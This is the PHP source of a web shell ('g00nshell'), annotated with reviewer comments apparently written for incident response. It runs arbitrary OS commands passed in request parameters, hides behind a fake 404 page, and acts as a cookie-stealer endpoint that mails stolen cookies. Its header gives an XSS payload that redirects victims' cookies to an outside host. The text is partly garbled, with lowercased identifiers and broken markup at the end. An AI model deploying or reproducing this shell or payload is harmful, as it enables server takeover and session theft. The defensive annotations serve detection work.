document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies # # # #in the ajax command shell, type 'home' to return to the shell's # #directory. type 'clear' to clear the output screen. # ##########################verification levels######################### #0: no protection; anyone can access # #1: user-agent required # #2: require ip # #3: basic authentication # ##############################known bugs############################## #the sql tool is not complete. there is currently no editing function# #available. some time in the future this may be fixed, but for now # #don't complain to me about it # ################################shouts################################ #pr0be - beta testing & css # #trintitty - beta testing # #clorox - beta testing # #everyone else at g00ns.net # ########################note to administrators######################## #if this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */

// NOTE(review): every identifier in this copy is lowercase ($_server, $_get).
// PHP variable names are case-sensitive, so this text is presumably a
// normalised extraction rather than the deployed file. Match on structure and
// strings when hunting, not on a hash of this listing.

// Configuration block: these values decide who may reach the shell.
$auth = 0; // verification level; per the header table, 0 = no protection, anyone who can request the file can use it
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 of the user-agent accepted at level 1 (unsalted, compared with != further down)
$ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access the shell at level 2
$email = ""; // e-mail address the `cookie` request parameter is mailed to; empty in this copy
$user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user for level 3
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password for level 3

// Global variables: server facts and request parameters read once at start-up.
$version = '1.4 beta';
$self = $_server['php_self'];
$soft = $_server['server_software'];
// split() is the POSIX-regex splitter that was removed in PHP 7.0, which dates
// the code; here it separates host and port in the Host header.
$servinf = split('[:]', $_server['http_host']);
$servip = $servinf[0];
$servport = @$servinf[1] ? $servinf[1] : '80'; // falls back to port 80 when the Host header carries no port
$cmd = @$_get['cmd']; // attacker-supplied command string; @ hides the notice when the parameter is absent
$act = @$_get['act']; // name of the tool page to show (dispatched further down the file)
$cmd = @$_get['cmd']; // duplicate of the assignment two lines up
$curdir = cleandir(getcwd()); // cleandir() is declared later in the file
if(@$_get['dir']){
    $dir = $_get['dir'];
    // 'nullz' is passed through untouched; any other value is resolved by cleandir().
    if($dir != 'nullz') $dir = cleandir($dir);
}
// NOTE(review): identifiers are lowercase throughout this copy ($_server,
// $_get, $_post, $_session, directory_separator). PHP variable and constant
// names are case-sensitive, so this is presumably a normalised extraction and
// not the deployed bytes.
//
// Request parameters read by the code below, useful when searching web logs:
// GET cmd, act, dir, f, img, cookie, ajxcmd; POST contents, gf.
$contents = @$_post['contents'];
$gf = @$_post['gf'];
$img = @$_get['img'];

// credits to disruptiv for this bit ;)
// Builds $me, the base for self-referencing links. Both halves of the || are
// the same test (more than one included file). $php_self is not assigned in
// the visible code; the earlier variable is $self (TODO confirm).
if(count(get_included_files()) > 1 || count(get_included_files()) > 1)
    list($me) = explode("&", $_server['request_uri']);
else
    $me = $php_self . "?";

// Errors from both calls are suppressed with @.
@session_start();
@set_time_limit(5);

switch($auth){ // authentication switcher, keyed on the $auth level from the configuration
    // Level 1: md5 of the User-Agent header must equal $uakey (loose != comparison).
    case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break;
    // Level 2: the client address must be in the $ip list.
    case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break;
    // Level 3: userauth() is called only when no basic-auth username was sent.
    case 3: if(!$_server['php_auth_user']) userauth(); break;
    // Level 0 and anything else: no check at all.
    default: break;
}

// Normalises a path: resolves it with realpath(), then replaces each doubled
// backslash with one backslash and each run of four forward slashes with two.
function cleandir($d){ // function to clean up the $dir and $curdir variables
    $d = realpath($d);
    $d = str_replace("\\\\", "\\", $d);
    $d = str_replace("////", "//", $d);
    return($d);
}

// Sends a basic-auth challenge header and calls hide() when the check fails.
// NOTE(review): as written, `!= $pass` sits inside the md5() argument, so
// md5() hashes the boolean result of the comparison rather than the supplied
// password, and that hash string is used as the condition. When scoping an
// incident, do not assume level 3 limited access to whoever held the
// credentials.
function userauth(){ // basic authentication function
    global $user, $pass;
    header("www-authenticate: basic realm='secure area'");
    if(md5($_server['php_auth_user']) != $user || md5($_server['php_auth_pw'] != $pass)) hide();
}

// Returns the first of popen/exec/shell_exec/system/passthru whose name does
// not occur as a substring of the disable_functions ini value. Falls off the
// end without a return value when all five occur; the ajax branch below then
// stops with "all execution methods disabled.".
function get_exec_function(){ // command execution method finder
    $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru");
    $disabled_funcs = ini_get('disable_functions');
    foreach($exec_functions as $f)
        if(strpos($disabled_funcs, $f) === false) return $f;
}

// Runs $command through the function named by $exec_function and echoes the
// output into the response. $command reaches the OS unmodified; in the
// visible caller it is the raw `ajxcmd` request parameter.
function execute_command($exec_function, $command){ // command execution function
    switch($exec_function){
        case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break;
        case "exec": exec($command, $result); foreach($result as $r) echo($r . "\n"); break;
        case "shell_exec": echo(shell_exec($command)); break;
        case "system": system($command); break;
        case "passthru": passthru($command); break;
    }
}

// Request dispatcher. main(), style(), view(), img(), grab(), files() and the
// handlers named in the switch are not defined in the visible source.
// No recognised parameter at all: show the main page.
if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img && !@$_get['ajxcmd']) main();
elseif(!$act && $cmd){ // raw command execution
    // As shown here the branch only calls style() and echoes two strings; no
    // execute_command() call is visible. It was possibly lost together with
    // the markup during extraction (TODO confirm).
    style();
    echo("
results:\n
");
echo("");
}
elseif(@$_get['ajxcmd']){ // command execution for ajax shell
    // "home" resets the per-session working directory to the script's own.
    if($_get['ajxcmd'] == "home") $_session['work_dir'] = getcwd();
    elseif($exec_function = get_exec_function()){
        // Input starting with "cd" is handled in PHP: the last space-separated
        // word becomes the target, and the directory is remembered in the
        // session so later requests run from it.
        if(strpos($_get['ajxcmd'], 'cd') === 0){
            $c = array_pop(explode(" ", $_get['ajxcmd']));
            if(@is_dir($_session['work_dir'] . directory_separator . $c) && $c[0] != '\\' && $c[0] != '//') $_session['work_dir'] .= directory_separator . $c;
            elseif(@is_dir($c) && $c[0] != '.') $_session['work_dir'] = $c;
            else echo("invalid directory\n");
        }
        else{
            // Anything else runs as an OS command from the remembered directory.
            @chdir($_session['work_dir']);
            execute_command($exec_function, $_get['ajxcmd']);
        }
    }
    else die("all execution methods disabled.");
}
// Mails the `cookie` GET parameter to $email, then calls hide(). Requests to
// this script carrying a `cookie` query parameter in access logs indicate the
// shell was used as a collection endpoint for data taken from other pages.
elseif(@$_get['cookie']){@mail($email, "cookie data", @$_get['cookie'], "from: $email"); hide();} // cookie stealer function
elseif($act == 'view' && @$_get['f'] && $dir) view($_get['f'], $dir);
elseif($img) img($img);
elseif($gf) grab($gf);
elseif(@$dir) files($dir);
else{
    // Tool pages selected by `act`. The 'sql' case appears twice; only the
    // first can match.
    switch($act){
        case 'phpinfo': phpinfo();break;
        case 'sql': sql();break;
        case 'files': files(@$dir);break;
        case 'email': email();break;
        case 'cmd': cmd();break;
        case 'upload': upload();break;
        case 'tools': tools();break;
        case 'sqllogin': sqllogin();break;
        case 'sql': sql();break;
        case 'lookup': lookup();break;
        case 'kill': kill();break;
        case 'phpexec': execphp();break;
        case 'bshell': bshell();break;
        default: main();break;
    }
}

// Sends a 404 status header and then leaves PHP mode, so the text that
// follows in the file is emitted as a not-found page for callers who fail the
// access check. Detection: a 404 response whose body is served by a script
// file that exists on disk. Whether the function ends the request is not
// visible here, because the rest of its body is garbled in this copy.
function hide(){ // hiding function
    global $self, $soft, $servip, $servport;
    header("http/1.0 404 not found");
    ?>
404 not found not found
the requested url was not found on this server.
additionally, a 404 not found error was encountered while trying to use an errordocument to handle the request.
> g00nshell v. <style> body { background-color:#000000; color:white; font-family:verdana; font-size:11px; } h1,h3 { color:white; font-family:verdana; font-size:11px; } input,textarea,select,button { color:#ffffff; background-color:#000000; border:1px solid #4f4f4f; font-family:verdana; font-size:11px; } textarea { font-family:courier; } a { color:#6f6f6f; text-decoration:none; font-family:verdana; font-size:11px; } a:hover { color:#7f7f7f; } td { font-size:12px; vertical-align:middle; } th { font-size:13px; vertical-align:middle; } table { empty-cells:show; } .inf { color:#7f7f7f; } 'command execute','files'=>'file view','phpinfo'=>'php info', 'phpexec'=>'php execute', 'tools'=>'tools','sqllogin'=>'sql','upload'=>'get files','kill'=>'kill shell'); $capt = array_flip($act); echo("